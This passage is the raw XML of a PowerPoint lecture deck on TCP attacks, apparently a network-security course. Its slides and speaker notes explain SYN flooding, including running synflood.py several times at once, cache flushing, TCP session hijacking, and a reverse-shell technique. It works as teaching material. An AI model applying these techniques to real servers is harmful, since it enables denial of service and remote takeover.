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1" r:id="rId2"/>
    <p:sldMasterId id="2147483673" r:id="rId3"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId69"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="266" r:id="rId8"/>
    <p:sldId id="312" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="325" r:id="rId14"/>
    <p:sldId id="271" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="276" r:id="rId19"/>
    <p:sldId id="326" r:id="rId20"/>
    <p:sldId id="328" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="320" r:id="rId23"/>
    <p:sldId id="317" r:id="rId24"/>
    <p:sldId id="319" r:id="rId25"/>
    <p:sldId id="330" r:id="rId26"/>
    <p:sldId id="321" r:id="rId27"/>
    <p:sldId id="318" r:id="rId28"/>
    <p:sldId id="280" r:id="rId29"/>
    <p:sldId id="281" r:id="rId30"/>
    <p:sldId id="331" r:id="rId31"/>
    <p:sldId id="282" r:id="rId32"/>
    <p:sldId id="283" r:id="rId33"/>
    <p:sldId id="332" r:id="rId34"/>
    <p:sldId id="284" r:id="rId35"/>
    <p:sldId id="315" r:id="rId36"/>
    <p:sldId id="287" r:id="rId37"/>
    <p:sldId id="288" r:id="rId38"/>
    <p:sldId id="289" r:id="rId39"/>
    <p:sldId id="290" r:id="rId40"/>
    <p:sldId id="291" r:id="rId41"/>
    <p:sldId id="292" r:id="rId42"/>
    <p:sldId id="333" r:id="rId43"/>
    <p:sldId id="297" r:id="rId44"/>
    <p:sldId id="334" r:id="rId45"/>
    <p:sldId id="303" r:id="rId46"/>
    <p:sldId id="304" r:id="rId47"/>
    <p:sldId id="305" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="299" r:id="rId50"/>
    <p:sldId id="307" r:id="rId51"/>
    <p:sldId id="342" r:id="rId52"/>
    <p:sldId id="308" r:id="rId53"/>
    <p:sldId id="335" r:id="rId54"/>
    <p:sldId id="336" r:id="rId55"/>
    <p:sldId id="337" r:id="rId56"/>
    <p:sldId id="338" r:id="rId57"/>
    <p:sldId id="339" r:id="rId58"/>
    <p:sldId id="340" r:id="rId59"/>
    <p:sldId id="341" r:id="rId60"/>
    <p:sldId id="310" r:id="rId61"/>
    <p:sldId id="323" r:id="rId62"/>
    <p:sldId id="322" r:id="rId63"/>
    <p:sldId id="324" r:id="rId64"/>
    <p:sldId id="311" r:id="rId65"/>
    <p:sldId id="302" r:id="rId66"/>
    <p:sldId id="316" r:id="rId67"/>
    <p:sldId id="301"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34" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="72" d="100"/>
        </p:scale>
        <p:origin x="405"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38785720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1711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21927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04060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5749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1455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7269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3710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7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Improve the success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rPr>
              <a:t>Simultaneously run multiple instances of synflood.py (6 times work quite well for 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rPr>
              <a:t>Reduce the queue size (to 80): for experiment purpose, not for real attack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8398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7192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38769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After making a TCP connection from 10.9.0.6 to the server 10.9.0.5, we can see that the IP address 10.9.0.6 is remembered (cached) by the server, so they will be using the reserved slots when connections come from them, and will thus not be affected by the SYN flooding attack. To remove the effect of this mitigation method, we can run the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> metrics flush" command on the server.</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99922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65429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4193611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014627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There is one more way to disconnec</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281107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3029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Uncheck the relative sequence number in the protocol preference option in Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171557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27507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48813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1950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1657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167313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34001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3911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06834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64381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87774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summary, the command starts a bash shell on the server machine whose input comes from a TCP connection and the output goes back to the same TCP connection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8F4F06F-1185-4038-BF21-B45636E4FE16}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1641688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step is not necessary in the real attack, but if we do not reset the connection, when we rerun the attack, we will have to change some of the TCP parameters, because the parameters used in the program already belong to an existing connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we don’t change the parameter, we will have to wait for quite a long time before the OS deletes the connection.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261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modern Linux operating systems, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command is actually a symbolic link to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ ls -al /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/alternatives | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>rsh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3459483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840626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send SYN packets first using random IP addresses. We will not be able to get the SYN + ACK response packet back from the server, but the only thing that we do not know about this packet is the sequence number from the server. If this number is always set to a known number, we have everything that we need to finish the three-way handshake protocol by sending out a forged ACK packet. When the server gets this packet, it will consider the connection as being established, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>will allocate a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>significant amount of resources for this connection. Basically, by sending only two small packets, an attacker can cause a server to commit a lot of resources. This can lead to denial-of-services attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UDP is not connection-based, so attackers do not need to establish a connection before launching the attack. That makes it feasible for spooﬁng the source IP address during the attack. Being able to use the target victim’s IP address as the source IP is essential for the UDP ampliﬁcation attack. TCP is connection-based, so before getting a reply from a server, a client needs to do a handshake with the server, making it infeasible for the client to use a spoofed source IP address. That is why TCP-based services are hard to use in attacks that are similar to the UDP ampliﬁcation attack.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123534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03278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55781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CN" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(1) No, they will not be mixed. TCP allocates separate buffers for different connections. Even though the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>two client programs come from the same computer, they have their own source port number, so the server treats them as separate connections, and give them separate buffers. Data coming from these two connections will be put into their corresponding buffers, not mixed. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(2) Yes, they will be mixed together. UDP is not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>connection-based, so it does not allocate buffers based on connections. There is only one receive buffer, so data sent to the same UDP port will be buffered together, even if they are sent by different senders. When reading data from the buffer, the UDP server program will be able to get the sender information. Therefore, it is up to the server program to separate the data if separation is desired. TCP does the separation for the server program.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="11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535467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7297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Flow Control : If one end of the connection sends data too fast, it may overwhelm the receive buffer of the other end and cause data being dropped.By putting a smaller window value, the receiver can tell the sender to slow down.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1202369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917011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B0EDE394-2EAE-41D5-A39F-8D30FFAC87F7}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023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821535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E7A8-C1C6-446B-8B86-C9E3524AB16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223EF74-424A-432A-B4D1-96F793AD498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BD108D-D6F4-48C0-B7FF-F113BB540AF0}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02583FD4-D4E8-4D83-A0C3-6A9D0BDF8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7C5BC-A918-4319-8861-A354FA15560D}"/>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41481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2D9F-174A-47DC-BB3F-D6389B69E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E27189-3D08-4160-B072-B5A41B63C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22788-81D9-4A1B-9B5E-681860AA5EED}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{968F042D-3726-443D-906D-2CCBDEDBC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523C0-0FE8-4E2F-8716-C58184B8E294}"/>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83782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5379-4C97-4589-8E5B-C924CA4E1E1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A8AEDA2-C1D1-4C51-9618-7B4C1608EB6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40483A-80C5-4080-BD15-208AAFDF4EC6}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7731B75-7C11-40A6-9377-0A2AD2FC8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A53CC-A718-49FA-A98B-6930320606C1}"/>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628961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58DB-B5A5-4AB6-B554-654B365EE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E9DBA-3421-4594-9728-4DB0A9BEFC4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2D180B-77CE-4A0F-9461-23865D953F7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EEB187-607C-46C2-B6C2-B7B3D6A8E6F2}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{282F48FA-29E4-4A95-8651-8921E34440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20D84-DDCB-4DF9-8BBF-35084D741429}"/>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524181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237A-F6F6-40A7-A1B7-783D3E94DE9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BCBDCB-9C52-4935-A4E0-0A53325341C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40A6B-D3C2-4127-9E4C-3C1E73F8758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704B6-8333-469C-9D7A-F45966ABAE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33F35-E763-4C3C-B631-85579B9BF9D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8F55D-FB50-4D2D-B050-D48E70E02208}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE767C13-7463-4B0E-9D61-D91D6A01F0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53044D-314E-4936-AF56-86AB2CEB5651}"/>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157827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58AA-9F0B-4300-8026-CD36D937AA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00B38-1C64-4C0D-BA61-913C55A6E74B}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BA7C7D-7F8F-44C6-A314-26C92798EE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37000-E687-4998-AD85-915D34273515}"/>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040354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3E121-E708-4762-854B-6CE3CCF8EE9F}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD602B8-A314-4E9E-9306-BE4EBCE492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29396C-9BEB-48EB-8B07-92CAB5EC32BC}"/>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2383436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302E-1FB6-43BA-9CD0-F6913BA5B07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A6F68A9-376E-43AE-B2C5-60E0BFC8120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B44ED-E5F1-411B-A86E-A38BB298E72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6950AB-162A-42DF-82B0-158D19587352}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D633CC58-293A-47BF-B413-ACD4495E5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04783-0975-4922-8836-2EADF82952F2}"/>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215054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9234-A1C4-409A-8223-E6A9AF8D480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55D431-06F1-4D69-847C-49463473B23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4DDC826-3EC4-4CBB-B545-A78FAAFBF4A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FE660E-88F9-403C-B64B-4F6217E02A97}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9B04DDC-C02B-40AA-98A7-5E4717392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08AAE-43CB-444A-B14C-8BFEE6BBAE2B}"/>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661861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FB3B-2D69-4F72-95EF-F2D7A53F79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F1DA5-E59D-4BBB-B2DE-93E08C5C0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ED658-33FC-4EB5-9135-6E8CA6DE5D81}"/>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5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FAA106-C63D-4644-82F7-0E99FB9027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9AF4A-981E-4C2A-B658-C0902B75CA88}"/>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397039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C12A1-7E80-4C5A-AC66-4D29B3CE9E8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66F6ED-FFAB-43D4-BB01-C468B5CF1AE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EE472-18C5-4611-A289-CBB3445F7967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5AE3139F-4758-4742-A141-DA56C55AD0AB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E7A70BE-C8F0-4E11-8ADE-EE171DB10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996E7-A900-44DA-8C35-35870B963913}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AEAD3903-1893-4005-8615-56A1122C7694}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230119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3967636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411020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748341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419933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884335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Date Placeholder 2"/>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2067211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2189525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382887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13726916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27031745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F1021-B266-43B3-BDEC-DFA811CAEF20}"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903F50-6C8B-4DF5-9707-78408FB2F531}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20887226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44771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3AD48F-17BE-4DDE-8FBE-21F92BFC6A8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01F6F-A132-4CF2-93E4-1B13C38D107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1754D-E828-48E7-8DEF-FE78923581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AE3139F-4758-4742-A141-DA56C55AD0AB}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFA18EAB-494D-4557-AEA1-909273929E1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63F186-9431-4727-A5BB-DAC4962BE5E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EAD3903-1893-4005-8615-56A1122C7694}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15730028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0F1021-B266-43B3-BDEC-DFA811CAEF20}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/27/2023</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903F50-6C8B-4DF5-9707-78408FB2F531}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41857412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2.tmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3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eg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout14.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image50.jp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png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout25.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.tmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide53.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wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Attacks on TCP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3-way Handshake Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3828825" y="1076034"/>
            <a:ext cx="5003475" cy="3817699"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>SYN Packet: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>The client sends a special packet called SYN packet to the server using a randomly generated number x as its sequence number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>SYN-ACK Packet:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="0" indent="-285750" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>On receiving it, the server sends a reply packet using its own randomly generated number y as its sequence number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0"/>
              <a:t>ACK Packet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="0" indent="-285750">
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t>Client sends out ACK packet to conclude the handshake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 y="1354880"/>
            <a:ext cx="3104493" cy="29107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9FDE-EFD0-885B-A262-5D66260471E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Establishing Connections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="Diagram&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E017A47-ABF6-4D1B-210D-C1C99B0679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143001"/>
            <a:ext cx="6304788" cy="3394472"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130326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TCP 3-way Handshake Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1152475"/>
            <a:ext cx="8520600" cy="37953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GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>When the server receives the initial SYN packet, it uses TCB (Transmission Control Block) to store the information about the connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This is called</a:t>
            </a:r>
